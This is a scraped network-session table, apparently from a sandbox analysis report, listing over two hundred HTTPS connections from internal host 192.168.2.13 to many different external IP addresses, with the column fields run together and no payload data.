                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25030192.168.2.1359826213.127.175.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25031192.168.2.135832225.138.116.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25032192.168.2.134431086.72.176.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25033192.168.2.1358384165.59.141.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25034192.168.2.1356814120.184.150.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25035192.168.2.1339058161.188.96.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25036192.168.2.1334138153.77.198.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25037192.168.2.1356916182.3.63.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25038192.168.2.1345130114.17.90.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25039192.168.2.1336548200.182.83.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25040192.168.2.1359250124.122.39.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25041192.168.2.1337040210.92.173.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25042192.168.2.1343386195.49.193.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25043192.168.2.1349350203.26.163.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25044192.168.2.1341116148.7.212.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25045192.168.2.133837232.120.79.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25046192.168.2.1336632185.14.200.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25047192.168.2.1348286149.192.168.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25048192.168.2.1354536204.234.237.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25049192.168.2.135040812.130.46.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25050192.168.2.1354250203.244.112.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25051192.168.2.1356732135.0.148.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25052192.168.2.1347812124.201.234.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25053192.168.2.135470254.203.22.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25054192.168.2.1359826183.50.197.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25055192.168.2.133371872.135.1.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25056192.168.2.1335836175.41.62.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25057192.168.2.133465836.251.19.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25058192.168.2.13545448.147.242.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25059192.168.2.133609664.122.225.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25060192.168.2.1360736174.89.251.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25061192.168.2.134356038.190.133.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25062192.168.2.1357744223.130.85.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25063192.168.2.135647869.199.183.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25064192.168.2.134945086.67.119.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25065192.168.2.1335346112.208.53.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25066192.168.2.1360624171.123.56.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25067192.168.2.135448887.132.17.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25068192.168.2.134577490.234.190.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25069192.168.2.134610649.73.139.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25070192.168.2.1359314209.208.80.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25071192.168.2.13537942.26.184.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25072192.168.2.1340144219.86.229.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25073192.168.2.1344888160.62.118.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25074192.168.2.134352277.13.53.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25075192.168.2.1335116204.212.92.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25076192.168.2.134800066.1.199.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25077192.168.2.1357538147.214.195.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25078192.168.2.1353254217.30.113.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25079192.168.2.1334738105.116.155.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25080192.168.2.1353354136.206.157.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25081192.168.2.1352240125.85.242.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25082192.168.2.1348228201.18.60.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25083192.168.2.1347604156.155.27.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25084192.168.2.134686853.142.143.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25085192.168.2.134072684.111.128.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25086192.168.2.1353218174.189.37.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25087192.168.2.1344046189.191.11.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25088192.168.2.1337076176.226.195.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25089192.168.2.1347468119.111.27.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25090192.168.2.1337178113.172.87.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25091192.168.2.1358992177.203.49.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25092192.168.2.133815642.126.25.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25093192.168.2.1336104181.49.112.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25094192.168.2.1348644191.208.4.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25095192.168.2.134430698.212.48.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25096192.168.2.1336470175.70.150.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25097192.168.2.1360386157.218.170.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25098192.168.2.134625861.85.94.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25099192.168.2.134289277.246.193.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25100192.168.2.1359002207.14.205.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25101192.168.2.1358230219.29.119.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25102192.168.2.134888018.221.115.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25103192.168.2.133813612.29.56.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25104192.168.2.1334966204.145.136.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25105192.168.2.1343412159.165.242.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25106192.168.2.133786265.17.0.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25107192.168.2.1334902122.233.87.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25108192.168.2.13343765.200.125.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25109192.168.2.1353296160.77.241.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25110192.168.2.1354416195.91.21.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25111192.168.2.135542867.75.90.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25112192.168.2.1353428138.219.230.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25113192.168.2.134627258.83.31.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25114192.168.2.135497849.177.169.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25115192.168.2.1338900108.204.228.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25116192.168.2.1348600185.200.18.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25117192.168.2.133859070.209.92.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25118192.168.2.1347514200.134.40.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25119192.168.2.135442239.99.25.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25120192.168.2.134056077.187.169.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25121192.168.2.1343296219.226.137.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25122192.168.2.135314491.122.20.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25123192.168.2.1339052162.10.135.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25124192.168.2.134079838.65.101.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25125192.168.2.1357586204.126.99.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25126192.168.2.1349374120.27.224.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25127192.168.2.1347446153.101.13.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25128192.168.2.1348640208.26.112.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25129192.168.2.135411636.16.10.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25130192.168.2.134712438.176.227.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25131192.168.2.1347188111.152.145.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25132192.168.2.133645427.148.205.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25133192.168.2.1355268134.183.27.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25134192.168.2.135192413.25.146.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25135192.168.2.1335292124.63.162.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25136192.168.2.1346064132.114.237.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25137192.168.2.1349604216.99.33.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25138192.168.2.1359912212.241.247.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25139192.168.2.1356282188.33.66.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25140192.168.2.135845253.24.154.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25141192.168.2.134161664.52.219.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25142192.168.2.135298861.39.55.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25143192.168.2.1336936142.74.137.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25144192.168.2.1359478164.199.150.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25145192.168.2.134892877.137.96.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25146192.168.2.134433013.12.67.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25147192.168.2.1354300179.141.47.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25148192.168.2.1351274174.106.126.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25149192.168.2.135157847.20.241.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25150192.168.2.1335388166.148.188.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25151192.168.2.1336378135.2.198.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25152192.168.2.1358582168.241.175.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25153192.168.2.1356558117.46.104.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25154192.168.2.134516476.103.114.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25155192.168.2.1348038117.171.102.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25156192.168.2.1353298114.153.146.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25157192.168.2.1347922201.175.143.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25158192.168.2.1346618143.23.135.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25159192.168.2.1343854107.15.122.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25160192.168.2.1343988113.165.74.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25161192.168.2.1356288223.159.246.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25162192.168.2.134978290.52.0.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25163192.168.2.1341070120.170.112.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25164192.168.2.134424225.52.198.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25165192.168.2.134812686.179.143.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25166192.168.2.1351978135.242.240.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25167192.168.2.134401227.145.103.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25168192.168.2.1342658210.48.182.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25169192.168.2.1351370185.168.152.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25170192.168.2.134004480.187.139.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25171192.168.2.1351360196.18.189.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25172192.168.2.1349840184.93.15.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25173192.168.2.1348376100.157.61.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25174192.168.2.133482212.120.60.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25175192.168.2.134702285.214.194.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25176192.168.2.1344080158.182.72.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25177192.168.2.1339474128.245.31.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25178192.168.2.1347976135.133.134.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25179192.168.2.1359020162.91.84.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25180192.168.2.134433848.30.98.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25181192.168.2.135974014.47.113.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25182192.168.2.134037260.201.201.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25183192.168.2.134752213.16.165.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25184192.168.2.135192219.146.170.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25185192.168.2.133879460.46.92.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25186192.168.2.134261668.22.63.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25187192.168.2.134338874.207.132.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25188192.168.2.1354004171.61.89.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25189192.168.2.1345366189.48.22.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25190192.168.2.1344316147.239.4.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25191192.168.2.1345190156.116.188.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25192192.168.2.134567897.219.147.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25193192.168.2.1340674160.241.134.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25194192.168.2.134588234.23.128.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25195192.168.2.1347854141.75.241.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25196192.168.2.134266288.4.28.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25197192.168.2.1356152149.227.190.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25198192.168.2.134507443.60.103.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25199192.168.2.135932240.80.235.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25200192.168.2.1354476107.202.116.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25201192.168.2.1334156191.44.194.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25202192.168.2.1359024223.48.103.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25203192.168.2.1334194147.233.104.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25204192.168.2.134310874.128.96.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25205192.168.2.135208618.106.4.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25206192.168.2.135297892.104.103.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25207192.168.2.135228850.6.85.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25208192.168.2.1354606136.30.60.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25209192.168.2.13407109.92.250.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25210192.168.2.1333062140.131.140.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25211192.168.2.134632012.101.109.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25212192.168.2.135765261.36.126.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25213192.168.2.134267813.196.11.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25214192.168.2.1335858120.166.58.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25215192.168.2.136062468.208.191.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25216192.168.2.1351934202.26.30.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25217192.168.2.134954448.217.3.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25218192.168.2.1357832218.139.80.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25219192.168.2.1357724172.90.44.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25220192.168.2.13442242.42.160.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25221192.168.2.136009287.215.248.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25222192.168.2.1353466157.160.159.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25223192.168.2.1348382137.165.168.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25224192.168.2.1345750142.187.0.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25225192.168.2.1360612190.94.111.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25226192.168.2.1339220123.223.128.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25227192.168.2.1354970166.43.214.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25228192.168.2.1350860222.172.47.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25229192.168.2.1340678121.11.154.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25230192.168.2.134276487.145.11.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25231192.168.2.1342590138.2.153.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25232192.168.2.1356462162.46.62.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25233192.168.2.1347706219.98.152.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25234192.168.2.1350018199.250.118.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25235192.168.2.1351550151.202.182.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25236192.168.2.133649698.116.142.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25237192.168.2.1354462123.30.247.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25238192.168.2.1345826176.238.191.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25239192.168.2.134887498.178.135.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25240192.168.2.1341898129.173.242.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25241192.168.2.133741236.240.247.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25242192.168.2.1337938180.13.239.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25243192.168.2.1353052179.137.192.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25244192.168.2.1360686158.167.29.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25245192.168.2.1348586134.210.119.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25246192.168.2.133915074.133.49.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25247192.168.2.1352874222.137.47.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25248192.168.2.135665883.214.110.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25249192.168.2.133903851.214.88.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25250192.168.2.133491684.138.218.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
